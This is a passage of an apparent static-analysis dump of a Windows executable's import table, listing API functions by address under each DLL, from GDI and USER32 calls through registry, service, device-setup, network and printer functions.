0x71e430 GetModuleHandleA
0x71e434 GetTickCount
0x71e438 GetTimeZoneInformation
0x71e43c SystemTimeToTzSpecificLocalTime
0x71e440 PeekNamedPipe
0x71e444 CreatePipe
0x71e448 Process32NextW
0x71e44c Process32FirstW
0x71e450 CreateToolhelp32Snapshot
0x71e454 ReadFile
0x71e458 QueryPerformanceFrequency
0x71e45c QueryPerformanceCounter
0x71e460 SetWaitableTimer
0x71e464 WaitForMultipleObjects
0x71e468 InterlockedExchangeAdd
0x71e46c TerminateThread
0x71e470 VerSetConditionMask
0x71e474 VerifyVersionInfoW
0x71e478 TlsFree
0x71e47c TlsGetValue
0x71e480 TlsAlloc
0x71e484 TlsSetValue
0x71e488 lstrlenA
0x71e48c ExitProcess
0x71e490 GetNumberFormatW
0x71e494 GetLocaleInfoW
0x71e498 InterlockedExchange
0x71e49c FindNextFileW
0x71e4a0 FindFirstFileW
0x71e4a4 GetFullPathNameW
0x71e4a8 FindClose
0x71e4ac RemoveDirectoryW
0x71e4b0 GlobalUnlock
0x71e4b4 GlobalAlloc
0x71e4b8 lstrcmpA
0x71e4bc GetModuleFileNameA
0x71e4c0 SetFileTime
0x71e4c4 SetFilePointer
0x71e4c8 GetFileSize
0x71e4cc GetFileAttributesExW
0x71e4d0 UnmapViewOfFile
0x71e4d4 MapViewOfFile
0x71e4d8 CreateFileMappingW
0x71e4dc LocalFree
0x71e4e0 FormatMessageW
0x71e4e4 GetCurrentThread
0x71e4e8 LoadLibraryW
0x71e4ec GetTimeFormatW
0x71e4f0 GetDateFormatW
0x71e4f4 WaitForMultipleObjectsEx
0x71e4f8 GlobalLock
0x71e4fc CreateSemaphoreA
0x71e500 ReleaseSemaphore
0x71e504 GetComputerNameW
0x71e508 WriteFile
0x71e50c CreateFileW
0x71e510 WaitForSingleObject
0x71e514 HeapCreate
0x71e518 DecodePointer
0x71e51c FormatMessageA
0x71e520 GetCommandLineW
0x71e524 CreateProcessW
0x71e528 GetStartupInfoW
0x71e52c GetLocalTime
0x71e530 InterlockedDecrement
0x71e534 InterlockedIncrement
0x71e538 LoadLibraryExW
0x71e53c FreeLibrary
0x71e540 Sleep
0x71e544 GetPrivateProfileStructW
0x71e548 WritePrivateProfileStructW
0x71e54c GetFileType
0x71e550 CreateEventW
0x71e554 GlobalFree
0x71e558 GetSystemInfo
USER32.dll
0x71e6d0 GetDlgItem
0x71e6d4 SendMessageW
0x71e6d8 GetWindowRect
0x71e6dc SetWindowLongW
0x71e6e0 LoadImageW
0x71e6e4 CheckRadioButton
0x71e6e8 ShowWindow
0x71e6ec ScreenToClient
0x71e6f0 MoveWindow
0x71e6f4 IsWindow
0x71e6f8 IsDlgButtonChecked
0x71e6fc EnableWindow
0x71e700 DefWindowProcW
0x71e704 CallWindowProcW
0x71e708 GetParent
0x71e70c DestroyIcon
0x71e710 LoadIconW
0x71e714 SetDlgItemTextW
0x71e718 EnumWindows
0x71e71c SetWindowPos
0x71e720 MapWindowPoints
0x71e724 GetClientRect
0x71e728 GetMonitorInfoW
0x71e72c MonitorFromWindow
0x71e730 GetWindow
0x71e734 SetWindowTextW
0x71e738 DestroyWindow
0x71e73c keybd_event
0x71e740 OffsetRect
0x71e744 DrawTextW
0x71e748 ReleaseDC
0x71e74c GetDC
0x71e750 CharNextW
0x71e754 GetWindowTextW
0x71e758 GetWindowTextLengthW
0x71e75c CreateWindowExW
0x71e760 SystemParametersInfoW
0x71e764 LoadCursorW
0x71e768 GetClassNameW
0x71e76c SetRectEmpty
0x71e770 InvalidateRect
0x71e774 UpdateWindow
0x71e778 PtInRect
0x71e77c GetCursorPos
0x71e780 GetDlgCtrlID
0x71e784 ReleaseCapture
0x71e788 LoadStringA
0x71e78c IsWindowVisible
0x71e790 GetWindowLongW
0x71e794 UnregisterClassW
0x71e798 GetClipboardData
0x71e79c IsClipboardFormatAvailable
0x71e7a0 CloseClipboard
0x71e7a4 SetClipboardData
0x71e7a8 EmptyClipboard
0x71e7ac OpenClipboard
0x71e7b0 GetDlgItemTextW
0x71e7b4 BringWindowToTop
0x71e7b8 CharLowerA
0x71e7bc CharLowerW
0x71e7c0 DrawTextExW
0x71e7c4 GetSysColorBrush
0x71e7c8 MapDialogRect
0x71e7cc LoadBitmapW
0x71e7d0 SetWindowPlacement
0x71e7d4 GetWindowPlacement
0x71e7d8 GetMenuItemCount
0x71e7dc CheckMenuItem
0x71e7e0 IsIconic
0x71e7e4 SwitchToThisWindow
0x71e7e8 TranslateAcceleratorW
0x71e7ec MonitorFromRect
0x71e7f0 EnableMenuItem
0x71e7f4 GetTopWindow
0x71e7f8 PostQuitMessage
0x71e7fc LoadAcceleratorsW
0x71e800 GetClassLongW
0x71e804 SetClassLongW
0x71e808 DeleteMenu
0x71e80c CheckDlgButton
0x71e810 EndDialog
0x71e814 IsMenu
0x71e818 GetMenuDefaultItem
0x71e81c LoadMenuW
0x71e820 GetSubMenu
0x71e824 SetForegroundWindow
0x71e828 CreateIconIndirect
0x71e82c SetMenuDefaultItem
0x71e830 RegisterWindowMessageW
0x71e834 InsertMenuItemW
0x71e838 GetMenuItemInfoW
0x71e83c SetMenuItemInfoW
0x71e840 CreateMenu
0x71e844 CopyRect
0x71e848 GetDesktopWindow
0x71e84c GetMenu
0x71e850 LoadStringW
0x71e854 GetForegroundWindow
0x71e858 CreateDialogParamW
0x71e85c DialogBoxParamW
0x71e860 PeekMessageW
0x71e864 GetMessageW
0x71e868 TranslateMessage
0x71e86c DispatchMessageW
0x71e870 RegisterClassW
0x71e874 GetClassInfoW
0x71e878 GetActiveWindow
0x71e87c MessageBoxW
0x71e880 FindWindowW
0x71e884 CallNextHookEx
0x71e888 SetWindowsHookExW
0x71e88c UnhookWindowsHookEx
0x71e890 GetKeyboardState
0x71e894 DestroyCursor
0x71e898 DestroyMenu
0x71e89c MonitorFromPoint
0x71e8a0 CreatePopupMenu
0x71e8a4 TrackPopupMenu
0x71e8a8 AppendMenuW
0x71e8ac GetDoubleClickTime
0x71e8b0 GetMessageTime
0x71e8b4 KillTimer
0x71e8b8 SetTimer
0x71e8bc RedrawWindow
0x71e8c0 IntersectRect
0x71e8c4 DrawEdge
0x71e8c8 SetWindowRgn
0x71e8cc GetScrollPos
0x71e8d0 SetScrollPos
0x71e8d4 GetScrollRange
0x71e8d8 SetScrollRange
0x71e8dc GetScrollInfo
0x71e8e0 SetScrollInfo
0x71e8e4 ShowScrollBar
0x71e8e8 GetClassInfoExW
0x71e8ec RegisterClassExW
0x71e8f0 GetKeyState
0x71e8f4 GetSystemMetrics
0x71e8f8 InflateRect
0x71e8fc PostMessageW
0x71e900 GetWindowDC
0x71e904 IsCharAlphaNumericW
0x71e908 BeginPaint
0x71e90c EndPaint
0x71e910 FillRect
0x71e914 IsWindowEnabled
0x71e918 GetSysColor
0x71e91c GetFocus
0x71e920 DrawFocusRect
0x71e924 SetCursor
0x71e928 SetFocus
0x71e92c SetCapture
0x71e930 GetCapture
0x71e934 wsprintfA
0x71e938 GetUserObjectSecurity
0x71e93c EnumDisplayDevicesW
0x71e940 EnumDisplaySettingsExW
GDI32.dll
0x71e144 GetDIBColorTable
0x71e148 StretchBlt
0x71e14c StartDocW
0x71e150 AbortDoc
0x71e154 EndDoc
0x71e158 StartPage
0x71e15c EndPage
0x71e160 GetBitmapBits
0x71e164 CreatePatternBrush
0x71e168 Ellipse
0x71e16c GetBitmapDimensionEx
0x71e170 SetBitmapDimensionEx
0x71e174 CreateBitmap
0x71e178 Polyline
0x71e17c DPtoLP
0x71e180 GetDeviceCaps
0x71e184 GetTextMetricsW
0x71e188 GetCurrentObject
0x71e18c GetBkColor
0x71e190 GetTextColor
0x71e194 Rectangle
0x71e198 SetPixel
0x71e19c LineTo
0x71e1a0 MoveToEx
0x71e1a4 RoundRect
0x71e1a8 CreatePen
0x71e1ac ExtTextOutW
0x71e1b0 CreateRoundRectRgn
0x71e1b4 BitBlt
0x71e1b8 CreateCompatibleDC
0x71e1bc CreateCompatibleBitmap
0x71e1c0 SetViewportOrgEx
0x71e1c4 CreateSolidBrush
0x71e1c8 GetTextExtentExPointW
0x71e1cc SaveDC
0x71e1d0 RestoreDC
0x71e1d4 SetBkColor
0x71e1d8 TextOutW
0x71e1dc GetTextExtentPoint32W
0x71e1e0 SetBkMode
0x71e1e4 SetTextColor
0x71e1e8 GetStockObject
0x71e1ec CreateFontIndirectW
0x71e1f0 DeleteDC
0x71e1f4 SelectObject
0x71e1f8 GetObjectW
0x71e1fc CreateDIBSection
0x71e200 DeleteObject
0x71e204 CreateDCW
0x71e208 ExtEscape
COMDLG32.dll
0x71e110 GetOpenFileNameW
0x71e114 PrintDlgExW
0x71e118 GetSaveFileNameW
ADVAPI32.dll
0x71e000 RegQueryValueExW
0x71e004 CryptGenRandom
0x71e008 CryptReleaseContext
0x71e00c CryptAcquireContextA
0x71e010 RegEnumKeyExW
0x71e014 RegQueryInfoKeyW
0x71e018 SetSecurityDescriptorDacl
0x71e01c InitializeSecurityDescriptor
0x71e020 RegDeleteValueW
0x71e024 RegCreateKeyExW
0x71e028 RegCreateKeyW
0x71e02c RegDeleteKeyW
0x71e030 RegSetValueExW
0x71e034 RegOpenKeyExW
0x71e038 RegCloseKey
0x71e03c GetTokenInformation
0x71e040 OpenProcessToken
0x71e044 GetUserNameW
0x71e048 GetLengthSid
0x71e04c InitializeAcl
0x71e050 AddAccessAllowedAce
0x71e054 SetSecurityDescriptorGroup
0x71e058 AllocateAndInitializeSid
0x71e05c FreeSid
0x71e060 OpenSCManagerW
0x71e064 EnumServicesStatusExW
0x71e068 CloseServiceHandle
0x71e06c RegEnumValueW
0x71e070 RegQueryValueExA
0x71e074 OpenServiceW
0x71e078 QueryServiceConfigW
0x71e07c EnumServicesStatusW
0x71e080 OpenThreadToken
0x71e084 ImpersonateSelf
0x71e088 LookupAccountSidW
0x71e08c GetSecurityDescriptorOwner
0x71e090 IsValidSid
0x71e094 LookupPrivilegeValueW
0x71e098 AdjustTokenPrivileges
0x71e09c GetSidSubAuthorityCount
0x71e0a0 GetSidLengthRequired
0x71e0a4 InitializeSid
0x71e0a8 GetSidIdentifierAuthority
0x71e0ac GetSidSubAuthority
0x71e0b0 LsaOpenPolicy
0x71e0b4 LsaQueryInformationPolicy
0x71e0b8 LsaFreeMemory
0x71e0bc CreateServiceA
0x71e0c0 DeleteService
0x71e0c4 OpenServiceA
0x71e0c8 StartServiceA
0x71e0cc ControlService
0x71e0d0 OpenSCManagerA
0x71e0d4 RegOpenKeyExA
0x71e0d8 ConvertStringSidToSidW
0x71e0dc RegLoadKeyW
0x71e0e0 RegUnLoadKeyW
0x71e0e4 RevertToSelf
0x71e0e8 AccessCheck
0x71e0ec IsValidSecurityDescriptor
0x71e0f0 SetSecurityDescriptorOwner
SHELL32.dll
0x71e674 DragQueryFileW
0x71e678 DragFinish
0x71e67c DuplicateIcon
0x71e680 Shell_NotifyIconW
0x71e684 ShellExecuteW
0x71e688 DoEnvironmentSubstW
0x71e68c SHGetSpecialFolderPathW
0x71e690 ShellExecuteExW
ole32.dll
0x71ea18 PropVariantClear
0x71ea1c CoSetProxyBlanket
0x71ea20 CoInitialize
0x71ea24 CoTaskMemAlloc
0x71ea28 CoInitializeSecurity
0x71ea2c CoUninitialize
0x71ea30 CoInitializeEx
0x71ea34 CoTaskMemFree
0x71ea38 CoCreateInstance
0x71ea3c CoTaskMemRealloc
OLEAUT32.dll
0x71e580 SafeArrayGetElement
0x71e584 SystemTimeToVariantTime
0x71e588 VariantInit
0x71e58c VariantClear
0x71e590 SysAllocString
0x71e594 SysFreeString
0x71e598 SafeArrayUnaccessData
0x71e59c SysAllocStringLen
0x71e5a0 VarUI4FromStr
0x71e5a4 VariantChangeType
0x71e5a8 VarBstrFromR8
0x71e5ac SafeArrayGetUBound
0x71e5b0 SafeArrayGetLBound
0x71e5b4 SafeArrayGetElemsize
0x71e5b8 SafeArrayGetVartype
0x71e5bc SafeArrayAccessData
0x71e5c0 SysAllocStringByteLen
0x71e5c4 SysStringByteLen
0x71e5c8 VariantCopy
0x71e5cc VarUdateFromDate
0x71e5d0 VariantTimeToSystemTime
0x71e5d4 SysStringLen
RPCRT4.dll
0x71e5fc UuidCreate
0x71e600 UuidToStringW
0x71e604 RpcStringFreeW
SETUPAPI.dll
0x71e60c SetupDiCallClassInstaller
0x71e610 CM_Get_DevNode_Registry_PropertyW
0x71e614 CM_Open_DevNode_Key
0x71e618 CM_Get_Parent
0x71e61c SetupOpenFileQueue
0x71e620 SetupScanFileQueueW
0x71e624 SetupDiSetDeviceInstallParamsW
0x71e628 SetupDiGetDeviceInstallParamsW
0x71e62c SetupDiSetSelectedDriverW
0x71e630 SetupDiEnumDeviceInfo
0x71e634 SetupDiGetSelectedDriverW
0x71e638 CM_Connect_MachineW
0x71e63c CM_Locate_DevNode_ExW
0x71e640 CM_Get_Child_Ex
0x71e644 CM_Get_DevNode_Registry_Property_ExW
0x71e648 CM_Get_Sibling_Ex
0x71e64c SetupDiDestroyDriverInfoList
0x71e650 SetupDiBuildDriverInfoList
0x71e654 SetupDiOpenDevRegKey
0x71e658 SetupDiGetDeviceInstanceIdW
0x71e65c SetupDiGetDeviceRegistryPropertyW
0x71e660 SetupDiGetDeviceRegistryPropertyA
0x71e664 SetupCloseFileQueue
0x71e668 SetupDiDestroyDeviceInfoList
0x71e66c SetupDiGetClassDevsW
POWRPROF.dll
0x71e5dc GetActivePwrScheme
0x71e5e0 ReadPwrScheme
0x71e5e4 GetPwrCapabilities
PSAPI.DLL
0x71e5ec GetProcessImageFileNameW
0x71e5f0 GetModuleFileNameExW
0x71e5f4 GetProcessMemoryInfo
WINMM.dll
0x71e998 waveOutMessage
0x71e99c waveOutGetDevCapsW
0x71e9a0 waveInGetDevCapsW
0x71e9a4 waveOutGetNumDevs
0x71e9a8 waveInGetNumDevs
0x71e9ac waveInMessage
NETAPI32.dll
0x71e56c NetWkstaGetInfo
0x71e570 NetUserGetInfo
0x71e574 NetUserModalsGet
0x71e578 NetApiBufferFree
SHLWAPI.dll
0x71e698 PathFileExistsW
0x71e69c PathAppendW
0x71e6a0 PathAddExtensionW
0x71e6a4 PathRemoveFileSpecW
0x71e6a8 PathIsDirectoryW
0x71e6ac PathStripPathW
0x71e6b0 PathMatchSpecW
0x71e6b4 PathRemoveExtensionW
0x71e6b8 PathCombineW
0x71e6bc PathFindFileNameA
0x71e6c0 PathCanonicalizeW
0x71e6c4 StrFormatByteSizeW
0x71e6c8 PathIsDirectoryEmptyW
MSIMG32.dll
0x71e560 AlphaBlend
0x71e564 TransparentBlt
COMCTL32.dll
0x71e0f8 DestroyPropertySheetPage
0x71e0fc _TrackMouseEvent
0x71e100 InitCommonControlsEx
0x71e104 PropertySheetW
0x71e108 CreatePropertySheetPageW
CRYPT32.dll
0x71e120 CryptQueryObject
0x71e124 CertGetNameStringW
0x71e128 CertCloseStore
0x71e12c CryptMsgClose
0x71e130 CertFindCertificateInStore
0x71e134 CryptDecodeObject
0x71e138 CryptMsgGetParam
0x71e13c CertFreeCertificateContext
WINTRUST.dll
0x71e9cc WinVerifyTrust
WS2_32.dll
0x71e9d4 WSALookupServiceEnd
0x71e9d8 WSAGetLastError
0x71e9dc WSALookupServiceNextW
0x71e9e0 WSACleanup
0x71e9e4 WSAStartup
0x71e9e8 WSALookupServiceBeginW
0x71e9ec inet_addr
0x71e9f0 htonl
0x71e9f4 inet_ntoa
0x71e9f8 WSAAddressToStringW
0x71e9fc htons
0x71ea00 getnameinfo
WINSPOOL.DRV
0x71e9b4 EnumPrintersW
0x71e9b8 None
0x71e9bc ClosePrinter
0x71e9c0 OpenPrinterW
0x71e9c4 GetPrinterDriverW
EAT(Export Address Table) is none